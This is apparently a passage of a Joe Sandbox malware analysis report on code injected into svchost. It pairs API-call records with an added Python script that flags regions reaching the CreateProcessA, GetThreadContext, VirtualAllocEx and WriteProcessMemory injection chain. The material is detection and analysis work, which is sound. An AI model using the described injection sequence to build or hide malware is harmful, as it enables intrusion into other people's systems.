                                • 78e0a58 -> 78e0140 -> 78e12c0 / 78e1460 / 78e1470 / 78e142d -> 78e0dc4 -> 78e0df8 -> 78e65e0 / 78e65f8 -> 78e6850 / 78e6860 -> 78e68a1 -> GetModuleHandleW (78e6ad8), and via 78e6b38 / 78e6b29 -> 78e57e0 -> LoadLibraryExW (78e6cf8); 78e6675 -> 78e7b09 / 78e7b50 / 78e7b3f -> 78e8d08 / 78e8c00 -> CreateWindowExW (78e8d42; 78e8224 -> 78e8d58)
                                • 179d110 -> 179d128 -> 78e824c / 78e8f01 / 78e8f10 / 78e9be9 -> 78e8374 (also 78e9e4c / 78e9d70 / 78e9d80 -> 78e9e38 / 78e9e29 -> 78eb2d3) -> CallWindowProcW (78eb39a)
                                • 78efdc0 -> 53f016c -> 53f2079 / 53f2100 / 53f2110 / 53f20d8 -> 53f2150 / 53f2140 -> 53f2290, which reaches CreateProcessA (53f26e0 / 53f26d0 / 53f2734 / 53f27a7 -> 53f60bd / 53f60c8 -> 53f6151), GetThreadContext (53f4282 / 53f35b2 -> 53f6448 / 53f6450), VirtualAllocEx (53f3afd / 53f3b1a -> 53f67a8 / 53f67b0) and WriteProcessMemory (53f31e4 / 53f3d6d / 53f3caf -> 53f6608 / 53f6600 -> 53f6650)
                                • 53f70d0 -> 53f70f6 -> 53f4d14 -> PostMessageW (53f7350)
                                The four calls reached from 53f2290 in the 053F0000 region (CreateProcessA, GetThreadContext, VirtualAllocEx, WriteProcessMemory) are the sequence used to start a process and write code into it before it runs; the 078E0000 region contributes only the handle, module, memory-protection and window calls.
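The execution graph above is the report's clearest evidence for what the code in svchost's 053F0000 region does, but it is only readable as an image. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses the two line formats the report uses verbatim (the memory dump source file name and the per-function API bullet) and checks the APIs a region reaches against the CreateProcessA / GetThreadContext / VirtualAllocEx / WriteProcessMemory chain. The field layout assumed for the .sdmp name (PID, snapshot index, dump id, base address, page protection, region type) is inferred from this report's own file names and is an assumption, not Joe Sandbox documentation; the sample lines are copied from the records on this page.

```python
"""Pull machine-readable indicators out of Joe Sandbox function records.

Added example, not part of the report. The .sdmp field layout below is
inferred from this report (it matches the hcaresult_<pid>_<snapshot>_<base>
snapshot names); treat it as an assumption, not as Joe Sandbox documentation.
"""
import re
from dataclasses import dataclass

PAGE_EXECUTE_READWRITE = 0x40  # Windows page-protection constant (documented)

# Assumed layout: <pid>.<snapshot>.<dump id>.<base>.<protection>.<type>.sdmp
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)
# Per-function API bullet: "CreateProcessA.KERNEL32(?,?,...), ref: 053F62FE"
API_RE = re.compile(r"^\s*(?:•\s*)?(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")

# The calls used to start a process and write code into it before it runs.
INJECTION_CHAIN = frozenset(
    {"CreateProcessA", "GetThreadContext", "VirtualAllocEx", "WriteProcessMemory"}
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    snapshot: int
    base: int
    protection: int
    region_type: int  # kept raw; the report does not say how it is encoded

    @property
    def is_rwx(self) -> bool:
        return self.protection == PAGE_EXECUTE_READWRITE


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int  # call-site address inside the dumped region


def parse_sdmp_name(name: str) -> DumpRegion:
    m = SDMP_RE.match(name.strip())
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    pid, snap, _dump_id, base, prot, rtype = m.groups()
    return DumpRegion(int(pid, 16), int(snap, 16), int(base, 16),
                      int(prot, 16), int(rtype, 16))


def parse_api_line(line: str) -> ApiCall:
    m = API_RE.match(line)
    if m is None:
        raise ValueError(f"not an API bullet: {line!r}")
    api, module, args, ref = m.groups()
    return ApiCall(api, module, tuple(a.strip() for a in args.split(",")), int(ref, 16))


def injection_chain_hits(api_names) -> frozenset:
    """Members of the injection chain present among the APIs a region reaches.

    Presence, not order, is tested: the execution graph is a call tree and does
    not fix the order in which the four calls execute.
    """
    return INJECTION_CHAIN & frozenset(api_names)


def describe_region(dump_name: str, api_names) -> str:
    region = parse_sdmp_name(dump_name)
    hits = injection_chain_hits(api_names)
    flags = []
    if region.is_rwx:
        flags.append("RWX")
    if hits == INJECTION_CHAIN:
        flags.append("injection-chain")
    elif hits:
        flags.append("partial-chain:" + ",".join(sorted(hits)))
    return (f"pid {region.pid} snapshot {region.snapshot} base 0x{region.base:08X} "
            f"prot 0x{region.protection:02X}: {', '.join(flags) or 'no flags'}")


# Constructed sample input: lines and API names copied from the records above.
SAMPLE_API_LINES = [
    "• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 053F62FE",
    "• WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 053F6698",
    "• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 078E8E6A",
    "• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01886DAF",
]
SVCHOST_53F0000_DUMP = "00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp"
SVCHOST_53F0000_APIS = ["CreateProcessA", "GetThreadContext", "VirtualAllocEx",
                        "WriteProcessMemory", "PostMessageW"]
SVCHOST_78E0000_DUMP = "00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp"
SVCHOST_78E0000_APIS = ["DuplicateHandle", "VirtualProtect", "CreateWindowExW",
                        "GetModuleHandleW", "LoadLibraryExW", "CallWindowProcW"]

if __name__ == "__main__":
    for line in SAMPLE_API_LINES:
        call = parse_api_line(line)
        print(f"{call.api:<20} {call.module:<10} ref 0x{call.ref:08X} ({len(call.args)} args)")
    print(describe_region(SVCHOST_53F0000_DUMP, SVCHOST_53F0000_APIS))
    print(describe_region(SVCHOST_78E0000_DUMP, SVCHOST_78E0000_APIS))
```

Both svchost regions are RWX (protection 0x40), but only the 053F0000 region reaches the full chain; the 078E0000 region's window and module calls produce no chain flag, which is the distinction a triage script should make before raising an injection finding.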

                                Executed Functions

                                Control-flow Graph

                                Rendered graph image not reproduced. 14 basic blocks, 78e8c00-78e8ec9. The entry block branches to 78e8ce2-78e8d35 (which may call 78e8224 at 78e8d38) or to 78e8d42-78e8dbe; the latter leads through 78e8dc9-78e8dd0 to 78e8ddb-78e8e7a, where CreateWindowExW is called. The function ends in a self-looping block at 78e8ec9.
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 078E8E6A
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 66fda44b6146c9fece9d9c6e85eb6a3a1a18202f87a3dc8ff5903755509709d9
                                • Instruction ID: 308f58c478ba6861466f316103890300efc5ba9e8ec4b17f9a5313811a925dcc
                                • Opcode Fuzzy Hash: 66fda44b6146c9fece9d9c6e85eb6a3a1a18202f87a3dc8ff5903755509709d9
                                • Instruction Fuzzy Hash: 94915DB1809389DFCB02CFA4D8509CDBFB1BF5A324F29929BE454AB2A2D3344955CF51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Rendered graph image not reproduced. 41 basic blocks, 53f60bd-53f640d. Three small self-looping blocks (53f617d-53f618c, 53f61d6-53f61e5, 53f623e-53f624d) precede the CreateProcessA call in 53f6257-53f6311; the remainder, 53f631a-53f640d, is a chain of short conditional blocks ending in a self-loop at 53f640d.
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 053F62FE
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: ce6c55dad14ca05e6eec67968db96ad7d161be20ec17bf3ab7fe5bdade661b51
                                • Instruction ID: 9b408491ac7642d84404f754d4634caf6a8f7fad2a5dbf2d8d26bd8a7f11527b
                                • Opcode Fuzzy Hash: ce6c55dad14ca05e6eec67968db96ad7d161be20ec17bf3ab7fe5bdade661b51
                                • Instruction Fuzzy Hash: 2AA17071D04219DFDF10CFA8C8427EEBBB2BF48304F158569E909A7250DB749985CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Rendered graph image not reproduced. 41 basic blocks, 53f60c8-53f640d: the same blocks as the 53f60bd function above, entered at 53f60c8. CreateProcessA is called in 53f6257-53f6311.
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 053F62FE
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 7d19bd96461c5f58e3370c2d0a29ce933a0ba89a932f00ba99ddf112d6fea9cf
                                • Instruction ID: 62b784fec30f1124a2743fb513a827473412dbea1fb1562f13605337afac80fe
                                • Opcode Fuzzy Hash: 7d19bd96461c5f58e3370c2d0a29ce933a0ba89a932f00ba99ddf112d6fea9cf
                                • Instruction Fuzzy Hash: 8D917F71D04219DFDF10CFA8C882BEEBBB2BF48314F158569E909A7290DB749985CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Rendered graph image not reproduced. 35 basic blocks, 78e68a1-78e6b20. The entry block calls 78e579c; later blocks call 78e6b38 or 78e6b29 (from 78e68cd), 78e57a8, 78e0d2c, 78e55e8 and 78e57b8, and 78e6de8 or 78e6df8 (from 78e69e0). GetModuleHandleW is called in 78e6ad8-78e6b03, reached from 78e6a10-78e6ad0.
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 078E6AF6
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 59f7cd3d7e4abb9bd08fca5a9b324135ac35937998380d659a1a6d2a9ff37cbc
                                • Instruction ID: 2bc5c27ee10967da318327cf550285965be05c04223d32ca32ccce2643c63c5e
                                • Opcode Fuzzy Hash: 59f7cd3d7e4abb9bd08fca5a9b324135ac35937998380d659a1a6d2a9ff37cbc
                                • Instruction Fuzzy Hash: C58167B0A00B068FD724DF29D44075ABBF5FF99214F10892ED48AD7A40EB35E845CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Rendered graph image not reproduced. 10 basic blocks, 78e8224-78e8ec9: the blocks shared with the 78e8c00 function above, entered at 78e8224 (the 78e8c00 function calls here from 78e8d38). The entry block 78e8224-78e8dbe leads via 78e8dc9-78e8dd0 to 78e8ddb-78e8e7a, where CreateWindowExW is called; the function ends in the self-looping block at 78e8ec9.
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 078E8E6A
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: a21dbc6f4fc19aceb7e8fbba3882a4679f204af463b1855912966ea929bd44e6
                                • Instruction ID: 4a76dcd814babb6f9775801776ce0839c489f41c50df438dad52c9859d5783f0
                                • Opcode Fuzzy Hash: a21dbc6f4fc19aceb7e8fbba3882a4679f204af463b1855912966ea929bd44e6
                                • Instruction Fuzzy Hash: 4F51C1B1D00309EFDB14CF99D884ADEBBB5BF59314F24852AE819AB210D7749885CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Rendered graph image not reproduced. 10 basic blocks, 78e8374-78eb41c. From 78eb342-78eb347 one path enters 78eb39a-78eb3d2, which calls CallWindowProcW; the other, 78eb349-78eb380, skips it. Block 78eb3ec-78eb40c calls 78e824c. All paths rejoin at 78eb40f-78eb41c.
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 078EB3C1
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 2bf4b290ffa0d45ed3bf701094e73e69027ec7981970fdd7dda3ad4cbe055f07
                                • Instruction ID: ceffd4c318966649ad496ba5995915cdfc3df5c133266f0ea7caa8dbe353ba49
                                • Opcode Fuzzy Hash: 2bf4b290ffa0d45ed3bf701094e73e69027ec7981970fdd7dda3ad4cbe055f07
                                • Instruction Fuzzy Hash: E4416AF4900309DFCB10CF99C489AAABBF9FF89314F248859E518A7320C730A841CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Rendered graph image not reproduced. 5 basic blocks, 53f6600-53f66de. The entry block optionally passes through 53f6658-53f6664 before 53f6666-53f66a5, which calls WriteProcessMemory, followed by 53f66a7-53f66ad and the exit block 53f66ae-53f66de.
                                APIs
                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 053F6698
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: a8d0180c82a4e6291a06403cf19b46cd362568068c7f4c5511f512beefafe9c1
                                • Instruction ID: 478761b5dbf26fa957f6650b7d6402d6f8fb5b3f789a16c8e61e962fdcf0f193
                                • Opcode Fuzzy Hash: a8d0180c82a4e6291a06403cf19b46cd362568068c7f4c5511f512beefafe9c1
                                • Instruction Fuzzy Hash: DB2148719003499FCF00CFA9D885BDEBBF5FF48314F148429E919A7240DB78A954CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Rendered graph image not reproduced. 5 basic blocks, 53f6608-53f66de: the same blocks as the 53f6600 function above, entered at 53f6608. WriteProcessMemory is called in 53f6666-53f66a5.
                                APIs
                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 053F6698
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,078E0476,?,?,?,?,?), ref: 078E0537
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                APIs
                                • GetThreadContext.KERNEL32(?,00000000), ref: 053F64CE
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,078E0476,?,?,?,?,?), ref: 078E0537
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                APIs
                                • GetThreadContext.KERNEL32(?,00000000), ref: 053F64CE
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,078E6B71,00000800,00000000,00000000), ref: 078E6D62
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                APIs
                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 078EEA4B
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 053F681E
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,078E6B71,00000800,00000000,00000000), ref: 078E6D62
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                APIs
                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 078EEA4B
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 053F681E
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 078E6AF6
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 053F73AD
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 053F73AD
                                Memory Dump Source
                                • Source File: 00000020.00000002.781350156.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_53f0000_svchost.jbxd
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 078EB3C1
                                Memory Dump Source
                                • Source File: 00000020.00000002.789906209.00000000078E0000.00000040.00000010.sdmp, Offset: 078E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_78e0000_svchost.jbxd
                                Strings
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                • String ID: d

                                Strings
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                • String ID: P@2l

                                Strings
                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                • String ID: P@2l

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 11a8f2450b03ea90e84530194d1ddcb96b01635d430de03014bbebc747233cbc
                                • Instruction ID: c301ceff4db4c0bb6ce6a1aad6e7da18d8da03358efde1ea1ed5b5b1db64091b
                                • Opcode Fuzzy Hash: 11a8f2450b03ea90e84530194d1ddcb96b01635d430de03014bbebc747233cbc
                                • Instruction Fuzzy Hash: 13315930B101148FCB14DFA9C498A6EBBF6AF8C714F258169E506DB7A4CBB0EC01CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cac97410329daaf3c252bfb9e6b266431a8a53c284c78defadc3c9029f9655e7
                                • Instruction ID: 392684285c2d47bb57a24cab5a0193d83f243bf5695f1910d1801693f4ec17b6
                                • Opcode Fuzzy Hash: cac97410329daaf3c252bfb9e6b266431a8a53c284c78defadc3c9029f9655e7
                                • Instruction Fuzzy Hash: 3B317F31B002185FD705A6B9885467FB6BBEBC8A20F64802DA505E7784CE75DD074B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7ef74fcdfff3f6c859495bdec4fcb59bbcb8fc10b59d0c519ccdefada028a43d
                                • Instruction ID: 46be71e17559bd80eb85c4b7750e4d60191f18552258c257d751da738287bebd
                                • Opcode Fuzzy Hash: 7ef74fcdfff3f6c859495bdec4fcb59bbcb8fc10b59d0c519ccdefada028a43d
                                • Instruction Fuzzy Hash: DF2171347406011BE708BA72E89973E66A3EBD1A34F69CD2CD6029B284DE759D0B57E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.757173047.000000000179D000.00000040.00000001.sdmp, Offset: 0179D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_179d000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6fb727080ca5cac46c23bb04cb42a2794e17f0e0e39978d52b54e4254fff266a
                                • Instruction ID: 1e46070bb0e2cb818e78c36e82880d2448b665adf9724c6b1168e2bec639ae77
                                • Opcode Fuzzy Hash: 6fb727080ca5cac46c23bb04cb42a2794e17f0e0e39978d52b54e4254fff266a
                                • Instruction Fuzzy Hash: 5E2125B6544204DFDF25CF94E9C0B26FB66FB84314F25C5ADD9094B246C336D84ACA61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 406e6e4899408dc320f50b8eb8d19952f5ace503e252c4c7bbbf02dd6fa20894
                                • Instruction ID: 5a80da6662618f677510aa6e50fe333c7d687627ccbd42083c1e84629b684ab3
                                • Opcode Fuzzy Hash: 406e6e4899408dc320f50b8eb8d19952f5ace503e252c4c7bbbf02dd6fa20894
                                • Instruction Fuzzy Hash: 5911C4316086158FC711DB14D480DA5FBEEEF45314729C966E41AC7746DB30FC068B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6a0b8983eac5e8d036e77ca8d719f96784b25e9390a902b2d0b3e03758979d85
                                • Instruction ID: 31f9addebad9d5ba483b25879959a3de05ede158dcd858d951527409cd719ebc
                                • Opcode Fuzzy Hash: 6a0b8983eac5e8d036e77ca8d719f96784b25e9390a902b2d0b3e03758979d85
                                • Instruction Fuzzy Hash: 4F21D574A04B158FD730DF39D848A6BBBF5BB48320B508F2D95ABC6698E770E544CB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3bfef8610c785d5937e2b09307f81c1bb87731b81caefd3d9961cc90ec24aed9
                                • Instruction ID: 7ffbf6d55e77f9b878ac2d935cb2eda8eb61e9034d1d26fa7c852d9f692666e9
                                • Opcode Fuzzy Hash: 3bfef8610c785d5937e2b09307f81c1bb87731b81caefd3d9961cc90ec24aed9
                                • Instruction Fuzzy Hash: F311A0757007118FD724EBA9D484D2FB7AAFFC4268B11892DE64A8B704DF71ED068B90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b42981f47197eab4905ed24ab45ae581946c5fcf555888cab39354f47f35ef27
                                • Instruction ID: 26c850e012a1c1e35f380cd353de6bca3c6162e931f11ea29d439ef3dc93d5a9
                                • Opcode Fuzzy Hash: b42981f47197eab4905ed24ab45ae581946c5fcf555888cab39354f47f35ef27
                                • Instruction Fuzzy Hash: 691125713046044BC710EFA9E481A6EB7A7BFC4624F908D2CE50A8B784DF70DC468BA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.757173047.000000000179D000.00000040.00000001.sdmp, Offset: 0179D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_179d000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a4a6d69dcac19fdb8a3552707fc77d34c4a78638005edc64a4181cec70993955
                                • Instruction ID: 0299c79eb95d83b79f5b4d43d179efd131323e853e81489162c72fed89412d00
                                • Opcode Fuzzy Hash: a4a6d69dcac19fdb8a3552707fc77d34c4a78638005edc64a4181cec70993955
                                • Instruction Fuzzy Hash: 7E11D0B6544280CFDB16CF54E9C4B15FF71FB44314F24C6A9D8494B656C33AD44ACB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 584f45ae5fc74f013b5fbfcae12dadd5e3c2971298a4148251f9d76e647cfc70
                                • Instruction ID: 166c1dc43c52cad6f376661411c8516e8f086c79ac841a9a90d6bb9b20ad4710
                                • Opcode Fuzzy Hash: 584f45ae5fc74f013b5fbfcae12dadd5e3c2971298a4148251f9d76e647cfc70
                                • Instruction Fuzzy Hash: 48116D30A002198BCB14DF69D4586EEBBB6FF88610F14C429D402B7398DB709C85CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 22773a5583e582e6cf353a3d814a5d221b4d5c6322f23d4d0396b14cffe3e18e
                                • Instruction ID: c8f3f3fedcb7927fc05227a92477494e9865339949e6077f5777325f9a1ec140
